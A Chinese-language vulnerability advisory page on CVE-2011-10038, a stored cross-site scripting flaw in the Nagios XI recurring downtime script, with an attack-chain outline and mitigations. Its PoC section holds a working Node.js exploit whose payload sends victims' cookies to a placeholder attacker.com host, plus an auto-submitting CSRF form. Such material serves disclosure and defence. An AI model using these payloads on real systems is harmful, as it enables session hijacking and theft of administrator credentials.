IPBUF安全漏洞报告
English
CVE-2011-10038 CVSS 5.4 中危

CVE-2011-10038: Nagios XI 2011R1.9之前版本跨站脚本(XSS)漏洞

披露日期: 2025-10-30
来源: [email protected]

漏洞信息

漏洞编号
CVE-2011-10038
漏洞类型
跨站脚本(XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Nagios XI

相关标签

CVE-2011-10038XSS跨站脚本存储型XSSNagios XIWeb应用安全CVE-2011recurring downtime网络监控工具

漏洞概述

CVE-2011-10038是Nagios XI产品中的一个存储型跨站脚本(XSS)安全漏洞。该漏洞存在于Nagios XI 2011R1.9之前版本的Web界面recurring downtime(定期 downtime)脚本中。漏洞的根本原因是应用程序对用户输入缺乏充分的验证和转义处理,攻击者可以通过在downtime相关参数中注入恶意JavaScript代码实现持久化的脚本执行。当其他用户(如管理员)访问受影响页面时,注入的恶意脚本会在其浏览器上下文中执行,可能导致会话劫持、敏感信息窃取、钓鱼攻击或对用户进行进一步的攻击。此漏洞需要认证用户身份(低权限即可)才能利用,但攻击成功后影响范围可扩展至访问该页面的所有用户。CVSS 3.1评分5.4,属于中等严重程度,主要影响系统的机密性和完整性。

技术细节

Nagios XI的recurring downtime功能允许用户创建和管理定期的监控 downtime计划。该功能在处理用户提供的downtime名称、时间参数或其他配置数据时,直接将用户输入呈现到Web页面而未进行充分的输入验证和输出编码。攻击者(已认证的低权限用户)可以构造包含恶意JavaScript代码的downtime配置,当管理员或其他用户查看downtime列表或相关报告时,恶意代码将在其浏览器中执行。漏洞利用的关键点包括:1) 攻击者需要拥有Nagios XI的有效账户(低权限即可);2) 通过recurring downtime脚本的参数注入XSS payload;3) 恶意脚本随页面响应存储在服务器端;4) 后续访问该页面的用户触发脚本执行。攻击者可利用此漏洞窃取管理员cookie、冒充管理员执行操作或传播恶意内容。由于是存储型XSS,攻击具有持久性特点。

攻击链分析

STEP 1
步骤1: 信息收集
攻击者识别目标系统运行Nagios XI,并确定版本低于2011R1.9
STEP 2
步骤2: 账户获取
攻击者通过社会工程、弱口令或其他方式获取Nagios XI的低权限账户
STEP 3
步骤3: 构造恶意payload
攻击者构造包含恶意JavaScript代码的XSS payload,用于窃取cookie或执行恶意操作
STEP 4
步骤4: 注入恶意代码
通过recurring downtime脚本的参数(如downtime_name)提交恶意payload,payload被存储在数据库中
STEP 5
步骤5: 等待触发
攻击者等待管理员或普通用户访问recurring downtime相关页面,触发存储的XSS代码执行
STEP 6
步骤6: 攻击成功
恶意JavaScript在受害者浏览器中执行,可窃取会话cookie、劫持账户或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// CVE-2011-10038 Nagios XI XSS PoC // Target: Nagios XI < 2011R1.9 recurring downtime script const axios = require('axios'); const cheerio = require('cheerio'); // Configuration const TARGET_URL = 'http://target-nagios-xi.com/nagiosxi/'; const USERNAME = 'attacker_user'; const PASSWORD = 'password123'; // XSS Payload - Cookie Stealer const XSS_PAYLOAD = '<script>new Image().src="http://attacker.com/log?c="+document.cookie</script>'; async function exploit() { console.log('[*] Starting CVE-2011-10038 exploitation...'); // Step 1: Login to Nagios XI const loginPage = await axios.get(TARGET_URL + 'login.php'); const $ = cheerio.load(loginPage.data); const nsp = $('input[name="nsp"]').val(); await axios.post(TARGET_URL + 'login.php', { username: USERNAME, password: PASSWORD, nsp: nsp }, { maxRedirects: 0 }).catch(e => {}); console.log('[+] Logged in successfully'); // Step 2: Create malicious recurring downtime with XSS payload const downtimeUrl = TARGET_URL + 'includes/components/recurring_downtime/submit.php'; const maliciousData = { host_name: 'localhost', downtime_name: XSS_PAYLOAD, service_description: '', day_of_week: '1', start_time: '00:00', end_time: '23:59', fixed: 0 }; try { await axios.post(downtimeUrl, maliciousData, { headers: { 'Content-Type': 'application/x-www-form-urlencoded' } }); console.log('[+] Malicious downtime created with XSS payload'); console.log('[+] Payload will execute when admin views downtime list'); } catch (error) { console.error('[-] Exploitation failed:', error.message); } } // Alternative: Direct CSRF PoC for unauthenticated scenario const CSRF_POC = ` <!-- CVE-2011-10038 CSRF to create XSS --> <html> <body> <form action="http://target-nagios-xi.com/nagiosxi/includes/components/recurring_downtime/submit.php" method="POST"> <input type="hidden" name="host_name" value="localhost"> <input type="hidden" name="downtime_name" value="<script>alert(document.cookie)</script>"> <input type="hidden" name="service_description" value=""> <input type="hidden" name="day_of_week" value="1"> <input type="hidden" name="start_time" value="00:00"> <input type="hidden" name="end_time" value="23:59"> <input type="submit" value="Submit"> </form> <script>document.forms[0].submit();</script> </body> </html> `; exploit();

影响范围

Nagios XI < 2011R1.9

防御指南

临时缓解措施
如果无法立即升级,可采取以下临时缓解措施:1) 在Web应用防火墙(WAF)中配置XSS防护规则,拦截包含script标签的请求;2) 临时禁用recurring downtime功能;3) 加强Nagios XI的用户认证机制,使用强密码策略和多因素认证;4) 限制低权限用户对downtime功能的访问;5) 监控Web服务器日志,关注异常的downtime配置请求;6) 提醒管理员不要点击可疑链接或访问不可信来源的Nagios XI页面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表